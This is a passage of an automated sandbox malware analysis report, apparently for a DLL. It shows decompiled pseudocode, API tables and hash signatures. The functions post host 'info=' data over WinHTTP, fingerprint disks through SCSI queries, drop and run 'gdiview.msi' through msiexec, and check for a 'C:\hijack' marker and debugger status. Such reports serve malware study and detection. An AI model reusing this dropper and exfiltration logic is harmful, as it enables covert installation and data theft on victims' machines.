				intOrPtr _t154;
				intOrPtr _t157;
				void* _t160;
				void* _t164;

				_t164 = __eflags;
				_t156 = __esi;
				_t155 = __edi;
				_t114 = __ebx;
				_push(0xffffffff);
				_push(E100232E0);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t157;
				_v224 = 0;
				_push(_a12);
				_push(0x4c);
				_push("post_info");
				_t75 = PathFindFileNameA(".\\post_info.cpp"); // executed
				E1001F230(__edi, "[HIJACK][%s][%s][%d]: data = %s\n", _t75); // executed
				_v48 = 0;
				_t77 = E10022530(__ebx, __edi, __esi, _t164, _a12);
				_t160 = _t157 - 0xe8 + 0x18;
				_v136 = _t77;
				E10001160( &_v132, _t164, 0x10025ca2);
				_v8 = 0;
				E10001160( &_v104, _t164, "info=");
				_v8 = 1;
				_v228 = E10001160( &_v164, _t164, _v136);
				_v232 = _v228;
				_v8 = 2;
				E10001A90( &_v104, _v232);
				_v8 = 1;
				E100011A0( &_v164);
				E10001160( &_v44, _t164, 0x10025ca3);
				_v8 = 3;
				E10001160( &_v76, _t164, 0x10025cb9);
				_v8 = 4;
				_v48 = 0;
				while(1) {
					_t165 = _v48 - 6;
					if(_v48 > 6) {
						break;
					}
					E100011C0( &_v132, 0x10025cba);
					_v236 = E10022710(_t114, _t155, _t156, _t165,  &_v192, _v48);
					_v240 = _v236;
					_v8 = 5;
					E10001A70( &_v132, _v240);
					_v8 = 4;
					E100011A0( &_v192);
					_v244 = E10001160( &_v220, _t165, _a8);
					_v248 = _v244;
					_v8 = 6;
					E10001A90( &_v132, _v248);
					_v8 = 4;
					E100011A0( &_v220);
					_push(E100011E0( &_v132));
					_push(0x61);
					_push("post_info");
					E1001F230(_t155, "[HIJACK][%s][%s][%d]: url = %s\n", PathFindFileNameA(".\\post_info.cpp")); // executed
					E100011C0( &_v44, 0x10025cbb);
					E100011C0( &_v76, 0x10025cce);
					_t109 = E10001200( &_v104);
					_t110 = E100011E0( &_v104);
					E10021C30(_t114, _t155, _t156, _t165, 0, 0, 0, E100011E0( &_v132), 2, 1, 0, _t110, _t109, 0, 0, 0, 0, 0, 0,  &_v44,  &_v76); // executed
					_t160 = _t160 + 0x60;
					_t113 = E10001200( &_v44);
					_t166 = _t113;
					if(_t113 == 0) {
						_t154 = _v48 + 1;
						__eflags = _t154;
						_v48 = _t154;
						continue;
					} else {
					}
					break;
				}
				_push(_v136);
				E1000CA40(_t114, _t155, _t156, _t166);
				E10001110(_a4, _t166,  &_v76);
				_v224 = _v224 | 0x00000001;
				_v8 = 3;
				E100011A0( &_v76);
				_v8 = 1;
				E100011A0( &_v44);
				_v8 = 0;
				E100011A0( &_v104);
				_v8 = 0xffffffff;
				E100011A0( &_v132);
				 *[fs:0x0] = _v16;
				return _a4;
			}































                                                                                                                                                                  0x10022d00
                                                                                                                                                                  0x10022d00
                                                                                                                                                                  0x10022d00
                                                                                                                                                                  0x10022d00
                                                                                                                                                                  0x10022d03
                                                                                                                                                                  0x10022d05
                                                                                                                                                                  0x10022d10
                                                                                                                                                                  0x10022d11
                                                                                                                                                                  0x10022d1e
                                                                                                                                                                  0x10022d2b
                                                                                                                                                                  0x10022d2c
                                                                                                                                                                  0x10022d2e
                                                                                                                                                                  0x10022d38
                                                                                                                                                                  0x10022d44
                                                                                                                                                                  0x10022d4c
                                                                                                                                                                  0x10022d57
                                                                                                                                                                  0x10022d5c
                                                                                                                                                                  0x10022d5f
                                                                                                                                                                  0x10022d6d
                                                                                                                                                                  0x10022d72
                                                                                                                                                                  0x10022d81
                                                                                                                                                                  0x10022d86
                                                                                                                                                                  0x10022d9c
                                                                                                                                                                  0x10022da8
                                                                                                                                                                  0x10022dae
                                                                                                                                                                  0x10022dbc
                                                                                                                                                                  0x10022dc1
                                                                                                                                                                  0x10022dcb
                                                                                                                                                                  0x10022dd8
                                                                                                                                                                  0x10022ddd
                                                                                                                                                                  0x10022de9
                                                                                                                                                                  0x10022dee
                                                                                                                                                                  0x10022df2
                                                                                                                                                                  0x10022e04
                                                                                                                                                                  0x10022e04
                                                                                                                                                                  0x10022e08
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10022e16
                                                                                                                                                                  0x10022e2e
                                                                                                                                                                  0x10022e3a
                                                                                                                                                                  0x10022e40
                                                                                                                                                                  0x10022e4e
                                                                                                                                                                  0x10022e53
                                                                                                                                                                  0x10022e5d
                                                                                                                                                                  0x10022e71
                                                                                                                                                                  0x10022e7d
                                                                                                                                                                  0x10022e83
                                                                                                                                                                  0x10022e91
                                                                                                                                                                  0x10022e96
                                                                                                                                                                  0x10022ea0
                                                                                                                                                                  0x10022ead
                                                                                                                                                                  0x10022eae
                                                                                                                                                                  0x10022eb0
                                                                                                                                                                  0x10022ec6
                                                                                                                                                                  0x10022ed6
                                                                                                                                                                  0x10022ee3
                                                                                                                                                                  0x10022eff
                                                                                                                                                                  0x10022f08
                                                                                                                                                                  0x10022f23
                                                                                                                                                                  0x10022f28
                                                                                                                                                                  0x10022f2e
                                                                                                                                                                  0x10022f33
                                                                                                                                                                  0x10022f35
                                                                                                                                                                  0x10022dfe
                                                                                                                                                                  0x10022dfe
                                                                                                                                                                  0x10022e01
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10022f37
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10022f35
                                                                                                                                                                  0x10022f44
                                                                                                                                                                  0x10022f45
                                                                                                                                                                  0x10022f54
                                                                                                                                                                  0x10022f62
                                                                                                                                                                  0x10022f68
                                                                                                                                                                  0x10022f6f
                                                                                                                                                                  0x10022f74
                                                                                                                                                                  0x10022f7b
                                                                                                                                                                  0x10022f80
                                                                                                                                                                  0x10022f87
                                                                                                                                                                  0x10022f8c
                                                                                                                                                                  0x10022f96
                                                                                                                                                                  0x10022fa1
                                                                                                                                                                  0x10022fab

                                                                                                                                                                  APIs
                                                                                                                                                                  • PathFindFileNameA.KERNELBASE(.\post_info.cpp,post_info,0000004C,?), ref: 10022D38
                                                                                                                                                                    • Part of subcall function 1001F230: _memset.LIBCMT ref: 1001F25B
                                                                                                                                                                    • Part of subcall function 1001F230: OutputDebugStringA.KERNEL32(?,?,?,?,?,10022D49,[HIJACK][%s][%s][%d]: data = %s), ref: 1001F293
                                                                                                                                                                    • Part of subcall function 10022530: _memset.LIBCMT ref: 10022584
                                                                                                                                                                    • Part of subcall function 10022530: _strlen.LIBCMT ref: 100225B8
                                                                                                                                                                    • Part of subcall function 10022530: _memset.LIBCMT ref: 10022626
                                                                                                                                                                    • Part of subcall function 10022530: _strlen.LIBCMT ref: 10022632
                                                                                                                                                                    • Part of subcall function 10022710: _memset.LIBCMT ref: 1002276B
                                                                                                                                                                    • Part of subcall function 10022710: GetLocalTime.KERNEL32(00000000,?,?,http://), ref: 1002278C
                                                                                                                                                                  • PathFindFileNameA.SHLWAPI(.\post_info.cpp,post_info,00000061,00000000,?,?,?,info=,10025CA2), ref: 10022EBA
                                                                                                                                                                    • Part of subcall function 10021C30: WinHttpOpen.WINHTTP(A WinHTTP Example Program/1.0,00000000,00000000,00000000,00000000), ref: 10021D64
                                                                                                                                                                    • Part of subcall function 10021C30: WinHttpSetOption.WINHTTP(00000000,00000026,00000003,0000000C), ref: 10021DAC
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memset$FileFindHttpNamePath_strlen$DebugLocalOpenOptionOutputStringTime
                                                                                                                                                                  • String ID: .\post_info.cpp$.\post_info.cpp$[HIJACK][%s][%s][%d]: data = %s$[HIJACK][%s][%s][%d]: url = %s$info=$post_info$post_info
                                                                                                                                                                  • API String ID: 2213638552-152146038
                                                                                                                                                                  • Opcode ID: 1568b6f6298a45623864e6ab8e00e2e8fe96cf20a69b2546b5d0c0ffb9461405
                                                                                                                                                                  • Instruction ID: 8607acd66d3c23fd638f037442e906d60192c638072a9ab774b96db5fff67154
                                                                                                                                                                  • Opcode Fuzzy Hash: 1568b6f6298a45623864e6ab8e00e2e8fe96cf20a69b2546b5d0c0ffb9461405
                                                                                                                                                                  • Instruction Fuzzy Hash: 57714E75D01248EBEB18DB94DD52BEEBB74EF18384F908098F60A77181EB712B45CB61
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1001D5C0, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 89%
                                                                                                                                                                  			E1001D5C0(void* __edi, char* _a4) {
				intOrPtr _v8;
				struct _OVERLAPPED* _v12;
				signed int _v16;
				struct _OVERLAPPED* _v20;
				struct _OVERLAPPED* _v24;
				intOrPtr _v28;
				void* _v32;
				short _v548;
				char _v1010;
				char _v1068;
				char _v1070;
				intOrPtr _v1084;
				intOrPtr _v1092;
				intOrPtr _v1096;
				intOrPtr _v1100;
				intOrPtr _v1104;
				void _v1108;
				char _v2132;
				struct _OVERLAPPED* _v2136;
				char _v2137;
				long _v2144;
				struct _OVERLAPPED* _v2148;
				intOrPtr _v2152;
				char* _v2156;
				void* _t79;
				int _t87;
				intOrPtr _t91;
				intOrPtr _t96;
				void* _t125;
				void* _t126;
				void* _t127;

				_t125 = __edi;
				_v20 = 0;
				_v2136 = 0;
				_v24 = 0;
				do {
					wsprintfW( &_v548, L"\\\\.\\Scsi%d:", _v20);
					_t127 = _t127 + 0xc;
					_t79 = CreateFileW( &_v548, 0xc0000000, 3, 0, 3, 0, 0); // executed
					_v32 = _t79;
					if(_v32 != 0xffffffff) {
						_v12 = 0;
						while(1 != 0) {
							E1000CF80(_t125,  &_v1108, 0, 0x22d);
							_t127 = _t127 + 0xc;
							_v1104 = 0x49534353;
							_v1100 = 0x4b534944;
							_v1068 = _v12;
							_v1108 = 0x1c;
							_v1096 = 0x2710;
							_v1084 = 0x211;
							_v1092 = 0x1b0501;
							_v1070 = 0xec;
							_t87 = DeviceIoControl(_v32, 0x4d008,  &_v1108, 0x3c,  &_v1108, 0x22d,  &_v2144, 0); // executed
							if(_t87 == 0 || _v1010 == 0) {
								L20:
								if(_v2136 != 0) {
									L23:
								} else {
									_v12 =  &(_v12->Internal);
									if(_v12 < 2) {
										goto L23;
									} else {
										continue;
									}
								}
							} else {
								_v16 = 0;
								do {
									 *(_t126 + _v16 * 4 - 0x850) =  *(_t126 + _v16 * 2 - 0x424) & 0x0000ffff;
									_v16 = _v16 + 1;
								} while (_v16 < 0x100);
								_t91 = E1001CDD0( &_v2132);
								_t127 = _t127 + 4;
								_v28 = _t91;
								_v2148 = 0;
								_v8 = 0x104;
								_v2156 = _a4;
								_v2152 = _v28 - _a4;
								while(_v8 != 0x80000106) {
									_v2137 =  *((intOrPtr*)(_v2156 + _v2152));
									if(_v2137 != 0) {
										 *_v2156 = _v2137;
										_v2156 = _v2156 + 1;
										_t96 = _v8 - 1;
										_v8 = _t96;
										if(_t96 != 0) {
											continue;
										} else {
											L17:
											_v2156 = _v2156 - 1;
											_v2148 = 0x8007007a;
										}
									} else {
										break;
									}
									L18:
									 *_v2156 = 0;
									if(_v2148 < 0) {
										goto L20;
									} else {
										goto L24;
									}
									goto L25;
								}
								if(_v8 == 0) {
									goto L17;
								} else {
								}
								goto L18;
							}
							L25:
							FindCloseChangeNotification(_v32); // executed
							_v20 = _v24;
							goto L26;
						}
						L24:
						_v2136 = 1;
						goto L25;
					}
					L26:
					_v20 =  &(_v20->Internal);
					_v24 = _v20;
				} while (_v20 < 0x10);
				return _v2136;
			}


































                                                                                                                                                                  0x1001d5c0
                                                                                                                                                                  0x1001d5c9
                                                                                                                                                                  0x1001d5d0
                                                                                                                                                                  0x1001d5da
                                                                                                                                                                  0x1001d5e1
                                                                                                                                                                  0x1001d5f1
                                                                                                                                                                  0x1001d5f7
                                                                                                                                                                  0x1001d610
                                                                                                                                                                  0x1001d616
                                                                                                                                                                  0x1001d61d
                                                                                                                                                                  0x1001d623
                                                                                                                                                                  0x1001d62a
                                                                                                                                                                  0x1001d645
                                                                                                                                                                  0x1001d64a
                                                                                                                                                                  0x1001d64d
                                                                                                                                                                  0x1001d657
                                                                                                                                                                  0x1001d664
                                                                                                                                                                  0x1001d66a
                                                                                                                                                                  0x1001d674
                                                                                                                                                                  0x1001d67e
                                                                                                                                                                  0x1001d688
                                                                                                                                                                  0x1001d692
                                                                                                                                                                  0x1001d6c0
                                                                                                                                                                  0x1001d6c8
                                                                                                                                                                  0x1001d7ce
                                                                                                                                                                  0x1001d7d5
                                                                                                                                                                  0x1001d7ed
                                                                                                                                                                  0x1001d7d7
                                                                                                                                                                  0x1001d7e0
                                                                                                                                                                  0x1001d7e6
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001d7e8
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001d7e8
                                                                                                                                                                  0x1001d7e6
                                                                                                                                                                  0x1001d6dd
                                                                                                                                                                  0x1001d6dd
                                                                                                                                                                  0x1001d6e4
                                                                                                                                                                  0x1001d6f2
                                                                                                                                                                  0x1001d6ff
                                                                                                                                                                  0x1001d702
                                                                                                                                                                  0x1001d712
                                                                                                                                                                  0x1001d717
                                                                                                                                                                  0x1001d71a
                                                                                                                                                                  0x1001d71d
                                                                                                                                                                  0x1001d727
                                                                                                                                                                  0x1001d731
                                                                                                                                                                  0x1001d73d
                                                                                                                                                                  0x1001d743
                                                                                                                                                                  0x1001d75a
                                                                                                                                                                  0x1001d769
                                                                                                                                                                  0x1001d779
                                                                                                                                                                  0x1001d784
                                                                                                                                                                  0x1001d78d
                                                                                                                                                                  0x1001d790
                                                                                                                                                                  0x1001d793
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001d795
                                                                                                                                                                  0x1001d7a1
                                                                                                                                                                  0x1001d7aa
                                                                                                                                                                  0x1001d7b0
                                                                                                                                                                  0x1001d7b0
                                                                                                                                                                  0x1001d76b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001d76b
                                                                                                                                                                  0x1001d7ba
                                                                                                                                                                  0x1001d7c0
                                                                                                                                                                  0x1001d7ca
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001d7cc
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001d7cc
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001d7ca
                                                                                                                                                                  0x1001d79d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001d79f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001d79d
                                                                                                                                                                  0x1001d7fe
                                                                                                                                                                  0x1001d802
                                                                                                                                                                  0x1001d80b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001d80b
                                                                                                                                                                  0x1001d7f4
                                                                                                                                                                  0x1001d7f4
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001d7f4
                                                                                                                                                                  0x1001d80e
                                                                                                                                                                  0x1001d814
                                                                                                                                                                  0x1001d81a
                                                                                                                                                                  0x1001d81d
                                                                                                                                                                  0x1001d830

                                                                                                                                                                  APIs
                                                                                                                                                                  • wsprintfW.USER32 ref: 1001D5F1
                                                                                                                                                                  • CreateFileW.KERNELBASE(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 1001D610
                                                                                                                                                                  • _memset.LIBCMT ref: 1001D645
                                                                                                                                                                  • DeviceIoControl.KERNELBASE(000000FF,0004D008,0000001C,0000003C,0000001C,0000022D,?,00000000), ref: 1001D6C0
                                                                                                                                                                  • FindCloseChangeNotification.KERNELBASE(000000FF), ref: 1001D802
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ChangeCloseControlCreateDeviceFileFindNotification_memsetwsprintf
                                                                                                                                                                  • String ID: DISK$SCSI$\\.\Scsi%d:$z
                                                                                                                                                                  • API String ID: 2954624657-153650326
                                                                                                                                                                  • Opcode ID: 90ef5bbd0890bfc1898be704e586c13b7574c8df0df48dfabe30e792a59f74e8
                                                                                                                                                                  • Instruction ID: 864252d3b8c7652c0464aea4c6b0448db3b04a664ea9bb53ad0bcbd264417217
                                                                                                                                                                  • Opcode Fuzzy Hash: 90ef5bbd0890bfc1898be704e586c13b7574c8df0df48dfabe30e792a59f74e8
                                                                                                                                                                  • Instruction Fuzzy Hash: 30614AB4D04259DBDB20EF94CC94BAEBBB0FB44308F1081D9D548AB280DB759AC4CF85
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1001FCD0, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E1001FCD0(void* __edi, void* __eflags) {
				char _v1027;
				char _v1028;
				char _v1291;
				char _v1292;
				int _t21;
				void* _t22;

				_t29 = __edi;
				_v1292 = 0;
				E1000CF80(__edi,  &_v1291, 0, 0x103);
				_v1028 = 0;
				E1000CF80(_t29,  &_v1027, 0, 0x3ff);
				GetTempPathA(0x104,  &_v1292);
				E1000CDB3( &_v1292,  &_v1292, 0x104, "gdiview.msi");
				E1000CCA3(_t29,  &_v1028, "msiexec.exe /i \"%s\"",  &_v1292);
				E1001FC70( &_v1292, 0x10027948, 0x39e00); // executed
				_t21 = PathFileExistsA( &_v1292); // executed
				_t38 = _t21;
				if(_t21 != 0) {
					_t22 = E1001A230(_t38,  &_v1028); // executed
					return _t22;
				}
				return _t21;
			}









                                                                                                                                                                  0x1001fcd0
                                                                                                                                                                  0x1001fcd9
                                                                                                                                                                  0x1001fcee
                                                                                                                                                                  0x1001fcf6
                                                                                                                                                                  0x1001fd0b
                                                                                                                                                                  0x1001fd1f
                                                                                                                                                                  0x1001fd36
                                                                                                                                                                  0x1001fd51
                                                                                                                                                                  0x1001fd6a
                                                                                                                                                                  0x1001fd79
                                                                                                                                                                  0x1001fd7f
                                                                                                                                                                  0x1001fd81
                                                                                                                                                                  0x1001fd8a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001fd8f
                                                                                                                                                                  0x1001fd95

                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 1001FCEE
                                                                                                                                                                  • _memset.LIBCMT ref: 1001FD0B
                                                                                                                                                                  • GetTempPathA.KERNEL32(00000104,00000000), ref: 1001FD1F
                                                                                                                                                                  • _strcat_s.LIBCMT ref: 1001FD36
                                                                                                                                                                  • _sprintf.LIBCMT ref: 1001FD51
                                                                                                                                                                    • Part of subcall function 1001FC70: CreateFileA.KERNELBASE(10027948,40000000,00000000,00000000,00000002,00000080,00000000), ref: 1001FC93
                                                                                                                                                                    • Part of subcall function 1001FC70: WriteFile.KERNELBASE(00039E00,00000000,00000000,10027948,00000000), ref: 1001FCAE
                                                                                                                                                                    • Part of subcall function 1001FC70: CloseHandle.KERNEL32(00039E00), ref: 1001FCC3
                                                                                                                                                                  • PathFileExistsA.KERNELBASE(00000000), ref: 1001FD79
                                                                                                                                                                    • Part of subcall function 1001A230: _memset.LIBCMT ref: 1001A245
                                                                                                                                                                    • Part of subcall function 1001A230: _memset.LIBCMT ref: 1001A269
                                                                                                                                                                    • Part of subcall function 1001A230: CreateProcessA.KERNELBASE ref: 1001A28B
                                                                                                                                                                    • Part of subcall function 1001A230: CloseHandle.KERNEL32(?), ref: 1001A299
                                                                                                                                                                    • Part of subcall function 1001A230: CloseHandle.KERNEL32(?), ref: 1001A2A3
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memset$CloseFileHandle$CreatePath$ExistsProcessTempWrite_sprintf_strcat_s
                                                                                                                                                                  • String ID: gdiview.msi$msiexec.exe /i "%s"
                                                                                                                                                                  • API String ID: 1459467440-729886463
                                                                                                                                                                  • Opcode ID: 638d147b60cdaad351f02d20a3a99ddd6a7d58331e397eb4a17339b0ef9d2ce5
                                                                                                                                                                  • Instruction ID: 3bad07f9b44ae76435dc987b8054c1e75e99d3347c25e4cce5c64bbb1e3e6184
                                                                                                                                                                  • Opcode Fuzzy Hash: 638d147b60cdaad351f02d20a3a99ddd6a7d58331e397eb4a17339b0ef9d2ce5
                                                                                                                                                                  • Instruction Fuzzy Hash: 651170B9D0021866E710D7A0AC46FEE73389B14705F4404E4EB48A5181EFB5A7C88F91
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 100206B5, Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 41COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 89%
                                                                                                                                                                  			E100206B5(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				int _t20;
				intOrPtr _t31;
				void* _t33;
				void* _t35;
				void* _t47;
				void* _t49;
				intOrPtr _t51;
				void* _t52;
				intOrPtr _t53;
				intOrPtr _t55;
				intOrPtr _t57;

				_t62 = __eflags;
				_t45 = __esi;
				_t44 = __edi;
				_t36 = __ebx;
				E1001FE40(); // executed
				E10020020(__ebx, __edi, __esi, __eflags, "install", "user01", "-0.1", "51.0", "exe"); // executed
				_t51 = _t49 + 0x14 - 0x1c;
				_t37 = _t51;
				 *((intOrPtr*)(_t47 - 0x248)) = _t51;
				 *((intOrPtr*)(_t47 - 0x260)) = E10001160(_t51, __eflags, "status=main_start");
				E100202C0(__ebx, __edi, __esi, _t62); // executed
				_t52 = _t51 + 0x1c;
				_t20 = PathFileExistsA("C:\\hijack"); // executed
				if(_t20 != 0) {
					L7:
					_t53 = _t52 - 0x1c;
					 *((intOrPtr*)(_t47 - 0x24c)) = _t53;
					 *((intOrPtr*)(_t47 - 0x264)) = E10001160(_t53, __eflags, "status=check_debug");
					E100202C0(_t36, _t44, _t45, __eflags); // executed
					_t55 = _t53 + 0x1c - 0x1c;
					 *((intOrPtr*)(_t47 - 0x250)) = _t55;
					 *((intOrPtr*)(_t47 - 0x268)) = E10001160(_t55, __eflags, "user01");
					E1001FF30(_t36, _t44, _t45, __eflags); // executed
					_t57 = _t55 + 0x1c - 0x1c;
					 *((intOrPtr*)(_t47 - 0x254)) = _t57;
					 *((intOrPtr*)(_t47 - 0x26c)) = E10001160(_t57, __eflags, "user01");
					E1001FE50(_t36, _t44, _t45, __eflags); // executed
					_t59 = _t57 + 0x1c - 0x1c;
					 *((intOrPtr*)(_t47 - 0x258)) = _t57 + 0x1c - 0x1c;
					 *((intOrPtr*)(_t47 - 0x270)) = E10001160(_t59, __eflags, "status=main_over");
					E100202C0(_t36, _t44, _t45, __eflags); // executed
				} else {
					E1001A100(); // executed
					_t33 = E1001A110(_t37); // executed
					if(_t33 == 0 || E10019D70() != 0) {
					} else {
						_t35 = E1001FA90(_t36, _t44, _t45, __eflags, 0x3e8, 0); // executed
						_t52 = _t52 + 8;
						__eflags = _t35;
						if(__eflags != 0) {
							goto L7;
						} else {
						}
					}
				}
				E1001A2C0(); // executed
				 *((intOrPtr*)(_t47 - 0x25c)) = 1;
				 *((intOrPtr*)(_t47 - 4)) = 0xffffffff;
				E100011A0(_t47 - 0x28);
				_t31 =  *((intOrPtr*)(_t47 - 0x25c));
				 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0xc));
				return _t31;
			}














                                                                                                                                                                  0x100206b5
                                                                                                                                                                  0x100206b5
                                                                                                                                                                  0x100206b5
                                                                                                                                                                  0x100206b5
                                                                                                                                                                  0x10020784
                                                                                                                                                                  0x100207a2
                                                                                                                                                                  0x100207aa
                                                                                                                                                                  0x100207ad
                                                                                                                                                                  0x100207af
                                                                                                                                                                  0x100207bf
                                                                                                                                                                  0x100207c5
                                                                                                                                                                  0x100207ca
                                                                                                                                                                  0x100207d2
                                                                                                                                                                  0x100207da
                                                                                                                                                                  0x10020810
                                                                                                                                                                  0x10020810
                                                                                                                                                                  0x10020815
                                                                                                                                                                  0x10020825
                                                                                                                                                                  0x1002082b
                                                                                                                                                                  0x10020833
                                                                                                                                                                  0x10020838
                                                                                                                                                                  0x10020848
                                                                                                                                                                  0x1002084e
                                                                                                                                                                  0x10020856
                                                                                                                                                                  0x1002085b
                                                                                                                                                                  0x1002086b
                                                                                                                                                                  0x10020871
                                                                                                                                                                  0x10020879
                                                                                                                                                                  0x1002087e
                                                                                                                                                                  0x1002088e
                                                                                                                                                                  0x10020894
                                                                                                                                                                  0x100207dc
                                                                                                                                                                  0x100207dc
                                                                                                                                                                  0x100207e1
                                                                                                                                                                  0x100207e8
                                                                                                                                                                  0x100207f8
                                                                                                                                                                  0x100207ff
                                                                                                                                                                  0x10020804
                                                                                                                                                                  0x10020807
                                                                                                                                                                  0x10020809
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1002080b
                                                                                                                                                                  0x10020809
                                                                                                                                                                  0x100207e8
                                                                                                                                                                  0x1002089c
                                                                                                                                                                  0x100208a1
                                                                                                                                                                  0x100208ab
                                                                                                                                                                  0x100208b5
                                                                                                                                                                  0x100208ba
                                                                                                                                                                  0x100208c3
                                                                                                                                                                  0x100208ce

                                                                                                                                                                  APIs
                                                                                                                                                                  • PathFileExistsA.KERNELBASE(C:\hijack), ref: 100207D2
                                                                                                                                                                    • Part of subcall function 10019D70: GetSystemDefaultLCID.KERNEL32 ref: 10019D7D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DefaultExistsFilePathSystem
                                                                                                                                                                  • String ID: -0.1$51.0$C:\hijack$exe$install$status=main_start$user01
                                                                                                                                                                  • API String ID: 482051434-2164037247
                                                                                                                                                                  • Opcode ID: 0be4b333ec2e3325d289ee9c9b191f0e101dd28759a6e9f942734f1c1f3d775c
                                                                                                                                                                  • Instruction ID: 9599716a8016536e2dc487c9b8d22fe1c18f1641b674e0e16c19d2f9c65c59e9
                                                                                                                                                                  • Opcode Fuzzy Hash: 0be4b333ec2e3325d289ee9c9b191f0e101dd28759a6e9f942734f1c1f3d775c
                                                                                                                                                                  • Instruction Fuzzy Hash: B2018138D04309AED710EBA5AC4A6DD77A3EF51294F9401A9FA0467643EF31A5809AA2
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1001DC60, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 119COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E1001DC60(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				struct _OSVERSIONINFOW _v284;
				char _v547;
				char _v548;
				char _v819;
				char _v820;
				char _v824;
				void* _t31;
				void* _t38;
				void* _t41;
				void* _t49;
				void* _t50;
				void* _t51;
				void* _t53;
				void* _t57;
				void* _t69;
				void* _t70;
				void* _t71;
				void* _t74;
				void* _t75;
				void* _t77;

				_t69 = __esi;
				_t68 = __edi;
				_t57 = __ebx;
				if(_a4 == 0) {
					return _t31;
				}
				_v820 = 0;
